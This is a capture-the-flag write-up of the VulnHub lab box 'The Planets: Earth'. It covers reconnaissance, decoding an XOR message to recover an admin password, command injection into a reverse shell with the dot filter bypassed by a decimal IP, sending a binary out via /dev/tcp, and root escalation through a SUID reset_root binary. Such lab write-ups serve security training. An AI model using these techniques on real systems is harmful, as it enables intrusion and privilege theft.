THE PLANETS
Name: The Planets: Earth Date release: 2 Nov 2021 Author: SirFlash Series: The Planets
Last updated
Name: The Planets: Earth Date release: 2 Nov 2021 Author: SirFlash Series: The Planets
Last updated
Back to the Top
Difficulty: Easy
Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
Mark as my last day for midterm and after so long break, today I will continue to look at the box Vulhub: The Planets: Earth. I choose this box because the topic it about Earth and it categorize as beginner. Without so, let move on.
Ps : assume this box and attacker box are in same network. In this case, I already setup only-host adapter for both machine
As usual, before we start doing something, we need to gather information about our target as many as possible. In this case, I use nmap scanning.
I scan for network to discover earth machine.
sudo nmap -sn <rangeIP>/24
After confirming our target machine IP. Let do scanning on available port.
As we can see, http and https port are open. But if notice there, port 80 return httpcode 400 (badrequest).
Another hint, I can see DNS name for this earth machine.
Put that DNS name into our hosts.
sudo nano /etc/hosts
Open up the browser with 2 DNS, both DNS shown the same landing page. Next let testing with robots.txt
HMHM,, what that means??. Let see what is about.
Some juicy information here. Overall, this notes talking about what encryption being used for secure messaging system. Next, it also talk about admin username. AND most important part is testdata.txt part. Using this information, we can find secret message.
We know that this system using XOR, let bruteforce it using the key given. Where to get the input??..
This mean, the earlier testing message locate at the below one. Decrypt it and get this.
So this can be something useful. Yeah credential ADMIN.
terra: earthclimatechangebad4humans
Wait wait⦠CLI??? Let test with simple command
Whattttβ¦β¦ there no filter on thisβ¦ HMMMMMβ¦ let put our payload into it. Before that, fire up our listener.
Oh no, the machine filter dot [.] After few research, I notice that the IP can be change into decimal.
Yeah where in.
This machine quite interesting since the permission only for root.
So we can skip part for user. (I dont notice it have 2 flag since user earth don't have any file)
Let find SUID for root
find / - perm -u=s -type f 2>/dev/null
Reset root??... Let check what it about. I push this into my local machine.
Open new listener with redirection to filename.
In earth machine
Cat the file with machineIP and port.
cat /usr/bin/reset_root > /dev/tcp/machineIP/8787
In our machine
Change the permission to 777 (why, because we need the permission to execute it).
Using ltrace to read the ELF binary file
So, the reset root need to check 3 file are present or not in order to trigger reset root. So, we can bypass it by manually create those 3 folder in earth machine.
Earth machine
Touch filename
After we done create all 3 file.
Let try trigger root user.
We successfully trigger rest root password and it given recovery password.
Now we can change into root user with password given
Poooff.. We in ass root.
Thank you for reading. This writeup are used for help me in future with the steps and for reference. I would say that this machine easy but not to easy.
Bypass filtered [.] in CLI using decimal IP.
XOR encryption
Bypass file checking by creating it.
